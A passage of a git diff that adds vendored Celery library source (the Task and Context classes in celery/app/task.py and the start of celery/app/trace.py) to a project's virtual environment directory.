celery.utils.imports import instantiate +from celery.utils.nodenames import gethostname +from celery.utils.serialization import raise_with_context + +from .annotations import resolve_all as resolve_all_annotations +from .registry import _unpickle_task_v2 +from .utils import appstr + +__all__ = ('Context', 'Task') + +#: extracts attributes related to publishing a message from an object. +extract_exec_options = mattrgetter( + 'queue', 'routing_key', 'exchange', 'priority', 'expires', + 'serializer', 'delivery_mode', 'compression', 'time_limit', + 'soft_time_limit', 'immediate', 'mandatory', # imm+man is deprecated +) + +# We take __repr__ very seriously around here ;) +R_BOUND_TASK = '' +R_UNBOUND_TASK = '' +R_INSTANCE = '<@task: {0.name} of {app}{flags}>' + +#: Here for backwards compatibility as tasks no longer use a custom meta-class. 
+TaskType = type + + +def _strflags(flags, default=''): + if flags: + return ' ({})'.format(', '.join(flags)) + return default + + +def _reprtask(task, fmt=None, flags=None): + flags = list(flags) if flags is not None else [] + flags.append('v2 compatible') if task.__v2_compat__ else None + if not fmt: + fmt = R_BOUND_TASK if task._app else R_UNBOUND_TASK + return fmt.format( + task, flags=_strflags(flags), + app=appstr(task._app) if task._app else None, + ) + + +class Context: + """Task request variables (Task.request).""" + + _children = None # see property + _protected = 0 + args = None + callbacks = None + called_directly = True + chain = None + chord = None + correlation_id = None + delivery_info = None + errbacks = None + eta = None + expires = None + group = None + group_index = None + headers = None + hostname = None + id = None + ignore_result = False + is_eager = False + kwargs = None + logfile = None + loglevel = None + origin = None + parent_id = None + properties = None + retries = 0 + reply_to = None + replaced_task_nesting = 0 + root_id = None + shadow = None + taskset = None # compat alias to group + timelimit = None + utc = None + stamped_headers = None + stamps = None + + def __init__(self, *args, **kwargs): + self.update(*args, **kwargs) + if self.headers is None: + self.headers = self._get_custom_headers(*args, **kwargs) + + def _get_custom_headers(self, *args, **kwargs): + headers = {} + headers.update(*args, **kwargs) + celery_keys = {*Context.__dict__.keys(), 'lang', 'task', 'argsrepr', 'kwargsrepr'} + for key in celery_keys: + headers.pop(key, None) + if not headers: + return None + return headers + + def update(self, *args, **kwargs): + return self.__dict__.update(*args, **kwargs) + + def clear(self): + return self.__dict__.clear() + + def get(self, key, default=None): + return getattr(self, key, default) + + def __repr__(self): + return f'' + + def as_execution_options(self): + limit_hard, limit_soft = self.timelimit or (None, None) + execution_options = { + 'task_id': self.id, + 'root_id': self.root_id, + 'parent_id': self.parent_id, + 'group_id': self.group, + 'group_index': self.group_index, + 'shadow': self.shadow, + 'chord': self.chord, + 'chain': self.chain, + 'link': self.callbacks, + 'link_error': self.errbacks, + 'expires': self.expires, + 'soft_time_limit': limit_soft, + 'time_limit': limit_hard, + 'headers': self.headers, + 'retries': self.retries, + 'reply_to': self.reply_to, + 'replaced_task_nesting': self.replaced_task_nesting, + 'origin': self.origin, + } + if hasattr(self, 'stamps') and hasattr(self, 'stamped_headers'): + if self.stamps is not None and self.stamped_headers is not None: + execution_options['stamped_headers'] = self.stamped_headers + for k, v in self.stamps.items(): + execution_options[k] = v + return execution_options + + @property + def children(self): + # children must be an empty list for every thread + if self._children is None: + self._children = [] + return self._children + + +@abstract.CallableTask.register +class Task: + """Task base class. + + Note: + When called tasks apply the :meth:`run` method. This method must + be defined by all tasks (that is unless the :meth:`__call__` method + is overridden). + """ + + __trace__ = None + __v2_compat__ = False # set by old base in celery.task.base + + MaxRetriesExceededError = MaxRetriesExceededError + OperationalError = OperationalError + + #: Execution strategy used, or the qualified name of one. 
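# NOTE (editor's sketch, not part of the vendored diff): the Context defined
# above is what a bound task sees as self.request.  Reuses the `app` and
# task conventions from the earlier sketches.
@app.task(bind=True)
def dump_context(self):
    return {
        'id': self.request.id,
        'retries': self.request.retries,
        'hostname': self.request.hostname,
        'is_eager': self.request.is_eager,
    }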
+ Strategy = 'celery.worker.strategy:default' + + #: Request class used, or the qualified name of one. + Request = 'celery.worker.request:Request' + + #: The application instance associated with this task class. + _app = None + + #: Name of the task. + name = None + + #: Enable argument checking. + #: You can set this to false if you don't want the signature to be + #: checked when calling the task. + #: Defaults to :attr:`app.strict_typing <@Celery.strict_typing>`. + typing = None + + #: Maximum number of retries before giving up. If set to :const:`None`, + #: it will **never** stop retrying. + max_retries = 3 + + #: Default time in seconds before a retry of the task should be + #: executed. 3 minutes by default. + default_retry_delay = 3 * 60 + + #: Rate limit for this task type. Examples: :const:`None` (no rate + #: limit), `'100/s'` (hundred tasks a second), `'100/m'` (hundred tasks + #: a minute),`'100/h'` (hundred tasks an hour) + rate_limit = None + + #: If enabled the worker won't store task state and return values + #: for this task. Defaults to the :setting:`task_ignore_result` + #: setting. + ignore_result = None + + #: If enabled the request will keep track of subtasks started by + #: this task, and this information will be sent with the result + #: (``result.children``). + trail = True + + #: If enabled the worker will send monitoring events related to + #: this task (but only if the worker is configured to send + #: task related events). + #: Note that this has no effect on the task-failure event case + #: where a task is not registered (as it will have no task class + #: to check this flag). + send_events = True + + #: When enabled errors will be stored even if the task is otherwise + #: configured to ignore results. + store_errors_even_if_ignored = None + + #: The name of a serializer that are registered with + #: :mod:`kombu.serialization.registry`. Default is `'json'`. + serializer = None + + #: Hard time limit. + #: Defaults to the :setting:`task_time_limit` setting. + time_limit = None + + #: Soft time limit. + #: Defaults to the :setting:`task_soft_time_limit` setting. + soft_time_limit = None + + #: The result store backend used for this task. + backend = None + + #: If enabled the task will report its status as 'started' when the task + #: is executed by a worker. Disabled by default as the normal behavior + #: is to not report that level of granularity. Tasks are either pending, + #: finished, or waiting to be retried. + #: + #: Having a 'started' status can be useful for when there are long + #: running tasks and there's a need to report what task is currently + #: running. + #: + #: The application default can be overridden using the + #: :setting:`task_track_started` setting. + track_started = None + + #: When enabled messages for this task will be acknowledged **after** + #: the task has been executed, and not *right before* (the + #: default behavior). + #: + #: Please note that this means the task may be executed twice if the + #: worker crashes mid execution. + #: + #: The application default can be overridden with the + #: :setting:`task_acks_late` setting. + acks_late = None + + #: When enabled messages for this task will be acknowledged even if it + #: fails or times out. + #: + #: Configuring this setting only applies to tasks that are + #: acknowledged **after** they have been executed and only if + #: :setting:`task_acks_late` is enabled. 
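# NOTE (editor's sketch, not part of the vendored diff): the class attributes
# above (max_retries, rate_limit, acks_late, ...) can be set per task through
# the decorator.  Reuses the `app` instance from the earlier sketches; the
# task itself is a placeholder.
@app.task(bind=True, max_retries=5, default_retry_delay=30,
          rate_limit='10/m', acks_late=True, ignore_result=True)
def fetch(self, url):
    ...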
+ #: + #: The application default can be overridden with the + #: :setting:`task_acks_on_failure_or_timeout` setting. + acks_on_failure_or_timeout = None + + #: Even if :attr:`acks_late` is enabled, the worker will + #: acknowledge tasks when the worker process executing them abruptly + #: exits or is signaled (e.g., :sig:`KILL`/:sig:`INT`, etc). + #: + #: Setting this to true allows the message to be re-queued instead, + #: so that the task will execute again by the same worker, or another + #: worker. + #: + #: Warning: Enabling this can cause message loops; make sure you know + #: what you're doing. + reject_on_worker_lost = None + + #: Tuple of expected exceptions. + #: + #: These are errors that are expected in normal operation + #: and that shouldn't be regarded as a real error by the worker. + #: Currently this means that the state will be updated to an error + #: state, but the worker won't log the event as an error. + throws = () + + #: Default task expiry time. + expires = None + + #: Default task priority. + priority = None + + #: Max length of result representation used in logs and events. + resultrepr_maxsize = 1024 + + #: Task request stack, the current request will be the topmost. + request_stack = None + + #: Some may expect a request to exist even if the task hasn't been + #: called. This should probably be deprecated. + _default_request = None + + #: Deprecated attribute ``abstract`` here for compatibility. + abstract = True + + _exec_options = None + + __bound__ = False + + from_config = ( + ('serializer', 'task_serializer'), + ('rate_limit', 'task_default_rate_limit'), + ('priority', 'task_default_priority'), + ('track_started', 'task_track_started'), + ('acks_late', 'task_acks_late'), + ('acks_on_failure_or_timeout', 'task_acks_on_failure_or_timeout'), + ('reject_on_worker_lost', 'task_reject_on_worker_lost'), + ('ignore_result', 'task_ignore_result'), + ('store_eager_result', 'task_store_eager_result'), + ('store_errors_even_if_ignored', 'task_store_errors_even_if_ignored'), + ) + + _backend = None # set by backend property. + + # - Tasks are lazily bound, so that configuration is not set + # - until the task is actually used + + @classmethod + def bind(cls, app): + was_bound, cls.__bound__ = cls.__bound__, True + cls._app = app + conf = app.conf + cls._exec_options = None # clear option cache + + if cls.typing is None: + cls.typing = app.strict_typing + + for attr_name, config_name in cls.from_config: + if getattr(cls, attr_name, None) is None: + setattr(cls, attr_name, conf[config_name]) + + # decorate with annotations from config. + if not was_bound: + cls.annotate() + + from celery.utils.threads import LocalStack + cls.request_stack = LocalStack() + + # PeriodicTask uses this to add itself to the PeriodicTask schedule. + cls.on_bound(app) + + return app + + @classmethod + def on_bound(cls, app): + """Called when the task is bound to an app. + + Note: + This class method can be defined to do additional actions when + the task class is bound to an app. + """ + + @classmethod + def _get_app(cls): + if cls._app is None: + cls._app = current_app + if not cls.__bound__: + # The app property's __set__ method is not called + # if Task.app is set (on the class), so must bind on use. 
+ cls.bind(cls._app) + return cls._app + app = class_property(_get_app, bind) + + @classmethod + def annotate(cls): + for d in resolve_all_annotations(cls.app.annotations, cls): + for key, value in d.items(): + if key.startswith('@'): + cls.add_around(key[1:], value) + else: + setattr(cls, key, value) + + @classmethod + def add_around(cls, attr, around): + orig = getattr(cls, attr) + if getattr(orig, '__wrapped__', None): + orig = orig.__wrapped__ + meth = around(orig) + meth.__wrapped__ = orig + setattr(cls, attr, meth) + + def __call__(self, *args, **kwargs): + _task_stack.push(self) + self.push_request(args=args, kwargs=kwargs) + try: + return self.run(*args, **kwargs) + finally: + self.pop_request() + _task_stack.pop() + + def __reduce__(self): + # - tasks are pickled into the name of the task only, and the receiver + # - simply grabs it from the local registry. + # - in later versions the module of the task is also included, + # - and the receiving side tries to import that module so that + # - it will work even if the task hasn't been registered. + mod = type(self).__module__ + mod = mod if mod and mod in sys.modules else None + return (_unpickle_task_v2, (self.name, mod), None) + + def run(self, *args, **kwargs): + """The body of the task executed by workers.""" + raise NotImplementedError('Tasks must define the run method.') + + def start_strategy(self, app, consumer, **kwargs): + return instantiate(self.Strategy, self, app, consumer, **kwargs) + + def delay(self, *args, **kwargs): + """Star argument version of :meth:`apply_async`. + + Does not support the extra options enabled by :meth:`apply_async`. + + Arguments: + *args (Any): Positional arguments passed on to the task. + **kwargs (Any): Keyword arguments passed on to the task. + Returns: + celery.result.AsyncResult: Future promise. + """ + return self.apply_async(args, kwargs) + + def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, + link=None, link_error=None, shadow=None, **options): + """Apply tasks asynchronously by sending a message. + + Arguments: + args (Tuple): The positional arguments to pass on to the task. + + kwargs (Dict): The keyword arguments to pass on to the task. + + countdown (float): Number of seconds into the future that the + task should execute. Defaults to immediate execution. + + eta (~datetime.datetime): Absolute time and date of when the task + should be executed. May not be specified if `countdown` + is also supplied. + + expires (float, ~datetime.datetime): Datetime or + seconds in the future for the task should expire. + The task won't be executed after the expiration time. + + shadow (str): Override task name used in logs/monitoring. + Default is retrieved from :meth:`shadow_name`. + + connection (kombu.Connection): Re-use existing broker connection + instead of acquiring one from the connection pool. + + retry (bool): If enabled sending of the task message will be + retried in the event of connection loss or failure. + Default is taken from the :setting:`task_publish_retry` + setting. Note that you need to handle the + producer/connection manually for this to work. + + retry_policy (Mapping): Override the retry policy used. + See the :setting:`task_publish_retry_policy` setting. + + time_limit (int): If set, overrides the default time limit. + + soft_time_limit (int): If set, overrides the default soft + time limit. + + queue (str, kombu.Queue): The queue to route the task to. 
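# NOTE (editor's sketch, not part of the vendored diff): annotate() and
# add_around() above apply the task_annotations setting when a task class is
# bound; keys starting with '@' wrap the named method.  Reuses the `app`
# instance from the earlier sketches; task names are placeholders.
app.conf.task_annotations = {
    'proj.add': {'rate_limit': '10/s'},
    '*': {'time_limit': 60},
}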
+ This must be a key present in :setting:`task_queues`, or + :setting:`task_create_missing_queues` must be + enabled. See :ref:`guide-routing` for more + information. + + exchange (str, kombu.Exchange): Named custom exchange to send the + task to. Usually not used in combination with the ``queue`` + argument. + + routing_key (str): Custom routing key used to route the task to a + worker server. If in combination with a ``queue`` argument + only used to specify custom routing keys to topic exchanges. + + priority (int): The task priority, a number between 0 and 9. + Defaults to the :attr:`priority` attribute. + + serializer (str): Serialization method to use. + Can be `pickle`, `json`, `yaml`, `msgpack` or any custom + serialization method that's been registered + with :mod:`kombu.serialization.registry`. + Defaults to the :attr:`serializer` attribute. + + compression (str): Optional compression method + to use. Can be one of ``zlib``, ``bzip2``, + or any custom compression methods registered with + :func:`kombu.compression.register`. + Defaults to the :setting:`task_compression` setting. + + link (Signature): A single, or a list of tasks signatures + to apply if the task returns successfully. + + link_error (Signature): A single, or a list of task signatures + to apply if an error occurs while executing the task. + + producer (kombu.Producer): custom producer to use when publishing + the task. + + add_to_parent (bool): If set to True (default) and the task + is applied while executing another task, then the result + will be appended to the parent tasks ``request.children`` + attribute. Trailing can also be disabled by default using the + :attr:`trail` attribute + + ignore_result (bool): If set to `False` (default) the result + of a task will be stored in the backend. If set to `True` + the result will not be stored. This can also be set + using the :attr:`ignore_result` in the `app.task` decorator. + + publisher (kombu.Producer): Deprecated alias to ``producer``. + + headers (Dict): Message headers to be included in the message. + + Returns: + celery.result.AsyncResult: Promise of future evaluation. + + Raises: + TypeError: If not enough arguments are passed, or too many + arguments are passed. Note that signature checks may + be disabled by specifying ``@task(typing=False)``. + kombu.exceptions.OperationalError: If a connection to the + transport cannot be made, or if the connection is lost. + + Note: + Also supports all keyword arguments supported by + :meth:`kombu.Producer.publish`. 
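# NOTE (editor's sketch, not part of the vendored diff): delay() is the
# positional shortcut, apply_async() exposes the execution options documented
# above.  Assumes the 'add' task from the registry sketch and a configured
# broker; the queue name is a placeholder.
result = add.delay(2, 2)
result = add.apply_async(
    (2, 2),
    countdown=10,          # execute no earlier than 10 seconds from now
    queue='priority',
    retry=True,
    retry_policy={'max_retries': 3, 'interval_start': 0,
                  'interval_step': 0.2, 'interval_max': 1},
)
print(result.id)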
+ """ + if self.typing: + try: + check_arguments = self.__header__ + except AttributeError: # pragma: no cover + pass + else: + check_arguments(*(args or ()), **(kwargs or {})) + + if self.__v2_compat__: + shadow = shadow or self.shadow_name(self(), args, kwargs, options) + else: + shadow = shadow or self.shadow_name(args, kwargs, options) + + preopts = self._get_exec_options() + options = dict(preopts, **options) if options else preopts + + options.setdefault('ignore_result', self.ignore_result) + if self.priority: + options.setdefault('priority', self.priority) + + app = self._get_app() + if app.conf.task_always_eager: + with app.producer_or_acquire(producer) as eager_producer: + serializer = options.get('serializer') + if serializer is None: + if eager_producer.serializer: + serializer = eager_producer.serializer + else: + serializer = app.conf.task_serializer + body = args, kwargs + content_type, content_encoding, data = serialization.dumps( + body, serializer, + ) + args, kwargs = serialization.loads( + data, content_type, content_encoding, + accept=[content_type] + ) + with denied_join_result(): + return self.apply(args, kwargs, task_id=task_id or uuid(), + link=link, link_error=link_error, **options) + else: + return app.send_task( + self.name, args, kwargs, task_id=task_id, producer=producer, + link=link, link_error=link_error, result_cls=self.AsyncResult, + shadow=shadow, task_type=self, + **options + ) + + def shadow_name(self, args, kwargs, options): + """Override for custom task name in worker logs/monitoring. + + Example: + .. code-block:: python + + from celery.utils.imports import qualname + + def shadow_name(task, args, kwargs, options): + return qualname(args[0]) + + @app.task(shadow_name=shadow_name, serializer='pickle') + def apply_function_async(fun, *args, **kwargs): + return fun(*args, **kwargs) + + Arguments: + args (Tuple): Task positional arguments. + kwargs (Dict): Task keyword arguments. + options (Dict): Task execution options. + """ + + def signature_from_request(self, request=None, args=None, kwargs=None, + queue=None, **extra_options): + request = self.request if request is None else request + args = request.args if args is None else args + kwargs = request.kwargs if kwargs is None else kwargs + options = {**request.as_execution_options(), **extra_options} + delivery_info = request.delivery_info or {} + priority = delivery_info.get('priority') + if priority is not None: + options['priority'] = priority + if queue: + options['queue'] = queue + else: + exchange = delivery_info.get('exchange') + routing_key = delivery_info.get('routing_key') + if exchange == '' and routing_key: + # sent to anon-exchange + options['queue'] = routing_key + else: + options.update(delivery_info) + return self.signature( + args, kwargs, options, type=self, **extra_options + ) + subtask_from_request = signature_from_request # XXX compat + + def retry(self, args=None, kwargs=None, exc=None, throw=True, + eta=None, countdown=None, max_retries=None, **options): + """Retry the task, adding it to the back of the queue. + + Example: + >>> from imaginary_twitter_lib import Twitter + >>> from proj.celery import app + + >>> @app.task(bind=True) + ... def tweet(self, auth, message): + ... twitter = Twitter(oauth=auth) + ... try: + ... twitter.post_status_update(message) + ... except twitter.FailWhale as exc: + ... # Retry in 5 minutes. + ... 
raise self.retry(countdown=60 * 5, exc=exc) + + Note: + Although the task will never return above as `retry` raises an + exception to notify the worker, we use `raise` in front of the + retry to convey that the rest of the block won't be executed. + + Arguments: + args (Tuple): Positional arguments to retry with. + kwargs (Dict): Keyword arguments to retry with. + exc (Exception): Custom exception to report when the max retry + limit has been exceeded (default: + :exc:`~@MaxRetriesExceededError`). + + If this argument is set and retry is called while + an exception was raised (``sys.exc_info()`` is set) + it will attempt to re-raise the current exception. + + If no exception was raised it will raise the ``exc`` + argument provided. + countdown (float): Time in seconds to delay the retry for. + eta (~datetime.datetime): Explicit time and date to run the + retry at. + max_retries (int): If set, overrides the default retry limit for + this execution. Changes to this parameter don't propagate to + subsequent task retry attempts. A value of :const:`None`, + means "use the default", so if you want infinite retries you'd + have to set the :attr:`max_retries` attribute of the task to + :const:`None` first. + time_limit (int): If set, overrides the default time limit. + soft_time_limit (int): If set, overrides the default soft + time limit. + throw (bool): If this is :const:`False`, don't raise the + :exc:`~@Retry` exception, that tells the worker to mark + the task as being retried. Note that this means the task + will be marked as failed if the task raises an exception, + or successful if it returns after the retry call. + **options (Any): Extra options to pass on to :meth:`apply_async`. + + Raises: + + celery.exceptions.Retry: + To tell the worker that the task has been re-sent for retry. + This always happens, unless the `throw` keyword argument + has been explicitly set to :const:`False`, and is considered + normal operation. + """ + request = self.request + retries = request.retries + 1 + if max_retries is not None: + self.override_max_retries = max_retries + max_retries = self.max_retries if max_retries is None else max_retries + + # Not in worker or emulated by (apply/always_eager), + # so just raise the original exception. + if request.called_directly: + # raises orig stack if PyErr_Occurred, + # and augments with exc' if that argument is defined. 
+ raise_with_context(exc or Retry('Task can be retried', None)) + + if not eta and countdown is None: + countdown = self.default_retry_delay + + is_eager = request.is_eager + S = self.signature_from_request( + request, args, kwargs, + countdown=countdown, eta=eta, retries=retries, + **options + ) + + if max_retries is not None and retries > max_retries: + if exc: + # On Py3: will augment any current exception with + # the exc' argument provided (raise exc from orig) + raise_with_context(exc) + raise self.MaxRetriesExceededError( + "Can't retry {}[{}] args:{} kwargs:{}".format( + self.name, request.id, S.args, S.kwargs + ), task_args=S.args, task_kwargs=S.kwargs + ) + + ret = Retry(exc=exc, when=eta or countdown, is_eager=is_eager, sig=S) + + if is_eager: + # if task was executed eagerly using apply(), + # then the retry must also be executed eagerly in apply method + if throw: + raise ret + return ret + + try: + S.apply_async() + except Exception as exc: + raise Reject(exc, requeue=False) + if throw: + raise ret + return ret + + def apply(self, args=None, kwargs=None, + link=None, link_error=None, + task_id=None, retries=None, throw=None, + logfile=None, loglevel=None, headers=None, **options): + """Execute this task locally, by blocking until the task returns. + + Arguments: + args (Tuple): positional arguments passed on to the task. + kwargs (Dict): keyword arguments passed on to the task. + throw (bool): Re-raise task exceptions. + Defaults to the :setting:`task_eager_propagates` setting. + + Returns: + celery.result.EagerResult: pre-evaluated result. + """ + # trace imports Task, so need to import inline. + from celery.app.trace import build_tracer + + app = self._get_app() + args = args or () + kwargs = kwargs or {} + task_id = task_id or uuid() + retries = retries or 0 + if throw is None: + throw = app.conf.task_eager_propagates + + # Make sure we get the task instance, not class. + task = app._tasks[self.name] + + request = { + 'id': task_id, + 'retries': retries, + 'is_eager': True, + 'logfile': logfile, + 'loglevel': loglevel or 0, + 'hostname': gethostname(), + 'callbacks': maybe_list(link), + 'errbacks': maybe_list(link_error), + 'headers': headers, + 'ignore_result': options.get('ignore_result', False), + 'delivery_info': { + 'is_eager': True, + 'exchange': options.get('exchange'), + 'routing_key': options.get('routing_key'), + 'priority': options.get('priority'), + } + } + if 'stamped_headers' in options: + request['stamped_headers'] = maybe_list(options['stamped_headers']) + request['stamps'] = { + header: maybe_list(options.get(header, [])) for header in request['stamped_headers'] + } + + tb = None + tracer = build_tracer( + task.name, task, eager=True, + propagate=throw, app=self._get_app(), + ) + ret = tracer(task_id, args, kwargs, request) + retval = ret.retval + if isinstance(retval, ExceptionInfo): + retval, tb = retval.exception, retval.traceback + if isinstance(retval, ExceptionWithTraceback): + retval = retval.exc + if isinstance(retval, Retry) and retval.sig is not None: + return retval.sig.apply(retries=retries + 1) + state = states.SUCCESS if ret.info is None else ret.info.state + return EagerResult(task_id, retval, state, traceback=tb) + + def AsyncResult(self, task_id, **kwargs): + """Get AsyncResult instance for the specified task. + + Arguments: + task_id (str): Task id to get result for. 
+ """ + return self._get_app().AsyncResult(task_id, backend=self.backend, + task_name=self.name, **kwargs) + + def signature(self, args=None, *starargs, **starkwargs): + """Create signature. + + Returns: + :class:`~celery.signature`: object for + this task, wrapping arguments and execution options + for a single task invocation. + """ + starkwargs.setdefault('app', self.app) + return signature(self, args, *starargs, **starkwargs) + subtask = signature + + def s(self, *args, **kwargs): + """Create signature. + + Shortcut for ``.s(*a, **k) -> .signature(a, k)``. + """ + return self.signature(args, kwargs) + + def si(self, *args, **kwargs): + """Create immutable signature. + + Shortcut for ``.si(*a, **k) -> .signature(a, k, immutable=True)``. + """ + return self.signature(args, kwargs, immutable=True) + + def chunks(self, it, n): + """Create a :class:`~celery.canvas.chunks` task for this task.""" + from celery import chunks + return chunks(self.s(), it, n, app=self.app) + + def map(self, it): + """Create a :class:`~celery.canvas.xmap` task from ``it``.""" + from celery import xmap + return xmap(self.s(), it, app=self.app) + + def starmap(self, it): + """Create a :class:`~celery.canvas.xstarmap` task from ``it``.""" + from celery import xstarmap + return xstarmap(self.s(), it, app=self.app) + + def send_event(self, type_, retry=True, retry_policy=None, **fields): + """Send monitoring event message. + + This can be used to add custom event types in :pypi:`Flower` + and other monitors. + + Arguments: + type_ (str): Type of event, e.g. ``"task-failed"``. + + Keyword Arguments: + retry (bool): Retry sending the message + if the connection is lost. Default is taken from the + :setting:`task_publish_retry` setting. + retry_policy (Mapping): Retry settings. Default is taken + from the :setting:`task_publish_retry_policy` setting. + **fields (Any): Map containing information about the event. + Must be JSON serializable. + """ + req = self.request + if retry_policy is None: + retry_policy = self.app.conf.task_publish_retry_policy + with self.app.events.default_dispatcher(hostname=req.hostname) as d: + return d.send( + type_, + uuid=req.id, retry=retry, retry_policy=retry_policy, **fields) + + def replace(self, sig): + """Replace this task, with a new task inheriting the task id. + + Execution of the host task ends immediately and no subsequent statements + will be run. + + .. versionadded:: 4.0 + + Arguments: + sig (Signature): signature to replace with. + visitor (StampingVisitor): Visitor API object. + + Raises: + ~@Ignore: This is always raised when called in asynchronous context. + It is best to always use ``return self.replace(...)`` to convey + to the reader that the task won't continue after being replaced. 
+ """ + chord = self.request.chord + if 'chord' in sig.options: + raise ImproperlyConfigured( + "A signature replacing a task must not be part of a chord" + ) + if isinstance(sig, _chain) and not getattr(sig, "tasks", True): + raise ImproperlyConfigured("Cannot replace with an empty chain") + + # Ensure callbacks or errbacks from the replaced signature are retained + if isinstance(sig, group): + # Groups get uplifted to a chord so that we can link onto the body + sig |= self.app.tasks['celery.accumulate'].s(index=0) + for callback in maybe_list(self.request.callbacks) or []: + sig.link(callback) + for errback in maybe_list(self.request.errbacks) or []: + sig.link_error(errback) + # If the replacement signature is a chain, we need to push callbacks + # down to the final task so they run at the right time even if we + # proceed to link further tasks from the original request below + if isinstance(sig, _chain) and "link" in sig.options: + final_task_links = sig.tasks[-1].options.setdefault("link", []) + final_task_links.extend(maybe_list(sig.options["link"])) + # We need to freeze the replacement signature with the current task's + # ID to ensure that we don't disassociate it from the existing task IDs + # which would break previously constructed results objects. + sig.freeze(self.request.id) + # Ensure the important options from the original signature are retained + replaced_task_nesting = self.request.get('replaced_task_nesting', 0) + 1 + sig.set( + chord=chord, + group_id=self.request.group, + group_index=self.request.group_index, + root_id=self.request.root_id, + replaced_task_nesting=replaced_task_nesting + ) + # If the task being replaced is part of a chain, we need to re-create + # it with the replacement signature - these subsequent tasks will + # retain their original task IDs as well + for t in reversed(self.request.chain or []): + sig |= signature(t, app=self.app) + return self.on_replace(sig) + + def add_to_chord(self, sig, lazy=False): + """Add signature to the chord the current task is a member of. + + .. versionadded:: 4.0 + + Currently only supported by the Redis result backend. + + Arguments: + sig (Signature): Signature to extend chord with. + lazy (bool): If enabled the new task won't actually be called, + and ``sig.delay()`` must be called manually. + """ + if not self.request.chord: + raise ValueError('Current task is not member of any chord') + sig.set( + group_id=self.request.group, + group_index=self.request.group_index, + chord=self.request.chord, + root_id=self.request.root_id, + ) + result = sig.freeze() + self.backend.add_to_chord(self.request.group, result) + return sig.delay() if not lazy else sig + + def update_state(self, task_id=None, state=None, meta=None, **kwargs): + """Update task state. + + Arguments: + task_id (str): Id of the task to update. + Defaults to the id of the current task. + state (str): New state. + meta (Dict): State meta-data. + """ + if task_id is None: + task_id = self.request.id + self.backend.store_result( + task_id, meta, state, request=self.request, **kwargs) + + def before_start(self, task_id, args, kwargs): + """Handler called before the task starts. + + .. versionadded:: 5.2 + + Arguments: + task_id (str): Unique id of the task to execute. + args (Tuple): Original arguments for the task to execute. + kwargs (Dict): Original keyword arguments for the task to execute. + + Returns: + None: The return value of this handler is ignored. + """ + + def on_success(self, retval, task_id, args, kwargs): + """Success handler. 
+ + Run by the worker if the task executes successfully. + + Arguments: + retval (Any): The return value of the task. + task_id (str): Unique id of the executed task. + args (Tuple): Original arguments for the executed task. + kwargs (Dict): Original keyword arguments for the executed task. + + Returns: + None: The return value of this handler is ignored. + """ + + def on_retry(self, exc, task_id, args, kwargs, einfo): + """Retry handler. + + This is run by the worker when the task is to be retried. + + Arguments: + exc (Exception): The exception sent to :meth:`retry`. + task_id (str): Unique id of the retried task. + args (Tuple): Original arguments for the retried task. + kwargs (Dict): Original keyword arguments for the retried task. + einfo (~billiard.einfo.ExceptionInfo): Exception information. + + Returns: + None: The return value of this handler is ignored. + """ + + def on_failure(self, exc, task_id, args, kwargs, einfo): + """Error handler. + + This is run by the worker when the task fails. + + Arguments: + exc (Exception): The exception raised by the task. + task_id (str): Unique id of the failed task. + args (Tuple): Original arguments for the task that failed. + kwargs (Dict): Original keyword arguments for the task that failed. + einfo (~billiard.einfo.ExceptionInfo): Exception information. + + Returns: + None: The return value of this handler is ignored. + """ + + def after_return(self, status, retval, task_id, args, kwargs, einfo): + """Handler called after the task returns. + + Arguments: + status (str): Current task state. + retval (Any): Task return value/exception. + task_id (str): Unique id of the task. + args (Tuple): Original arguments for the task. + kwargs (Dict): Original keyword arguments for the task. + einfo (~billiard.einfo.ExceptionInfo): Exception information. + + Returns: + None: The return value of this handler is ignored. + """ + + def on_replace(self, sig): + """Handler called when the task is replaced. + + Must return super().on_replace(sig) when overriding to ensure the task replacement + is properly handled. + + .. versionadded:: 5.3 + + Arguments: + sig (Signature): signature to replace with. + """ + # Finally, either apply or delay the new signature! + if self.request.is_eager: + return sig.apply().get() + else: + sig.delay() + raise Ignore('Replaced by new task') + + def add_trail(self, result): + if self.trail: + self.request.children.append(result) + return result + + def push_request(self, *args, **kwargs): + self.request_stack.push(Context(*args, **kwargs)) + + def pop_request(self): + self.request_stack.pop() + + def __repr__(self): + """``repr(task)``.""" + return _reprtask(self, R_INSTANCE) + + def _get_request(self): + """Get current request object.""" + req = self.request_stack.top + if req is None: + # task was not called, but some may still expect a request + # to be there, perhaps that should be deprecated. 
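+            # fall back to a single, lazily created blank Context that is
+            # reused for all direct calls on this task instance.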
+ if self._default_request is None: + self._default_request = Context() + return self._default_request + return req + request = property(_get_request) + + def _get_exec_options(self): + if self._exec_options is None: + self._exec_options = extract_exec_options(self) + return self._exec_options + + @property + def backend(self): # noqa: F811 + backend = self._backend + if backend is None: + return self.app.backend + return backend + + @backend.setter + def backend(self, value): + self._backend = value + + @property + def __name__(self): + return self.__class__.__name__ + + +BaseTask = Task # XXX compat alias diff --git a/env/Lib/site-packages/celery/app/trace.py b/env/Lib/site-packages/celery/app/trace.py new file mode 100644 index 00000000..3933d01a --- /dev/null +++ b/env/Lib/site-packages/celery/app/trace.py @@ -0,0 +1,763 @@ +"""Trace task execution. + +This module defines how the task execution is traced: +errors are recorded, handlers are applied and so on. +""" +import logging +import os +import sys +import time +from collections import namedtuple +from typing import Any, Callable, Dict, FrozenSet, Optional, Sequence, Tuple, Type, Union +from warnings import warn + +from billiard.einfo import ExceptionInfo, ExceptionWithTraceback +from kombu.exceptions import EncodeError +from kombu.serialization import loads as loads_message +from kombu.serialization import prepare_accept_content +from kombu.utils.encoding import safe_repr, safe_str + +import celery +import celery.loaders.app +from celery import current_app, group, signals, states +from celery._state import _task_stack +from celery.app.task import Context +from celery.app.task import Task as BaseTask +from celery.exceptions import BackendGetMetaError, Ignore, InvalidTaskError, Reject, Retry +from celery.result import AsyncResult +from celery.utils.log import get_logger +from celery.utils.nodenames import gethostname +from celery.utils.objects import mro_lookup +from celery.utils.saferepr import saferepr +from celery.utils.serialization import get_pickleable_etype, get_pickleable_exception, get_pickled_exception + +# ## --- +# This is the heart of the worker, the inner loop so to speak. +# It used to be split up into nice little classes and methods, +# but in the end it only resulted in bad performance and horrible tracebacks, +# so instead we now use one closure per task class. + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. +# pylint: disable=broad-except +# We know what we're doing... + + +__all__ = ( + 'TraceInfo', 'build_tracer', 'trace_task', + 'setup_worker_optimizations', 'reset_worker_optimizations', +) + +from celery.worker.state import successful_requests + +logger = get_logger(__name__) + +#: Format string used to log task receipt. +LOG_RECEIVED = """\ +Task 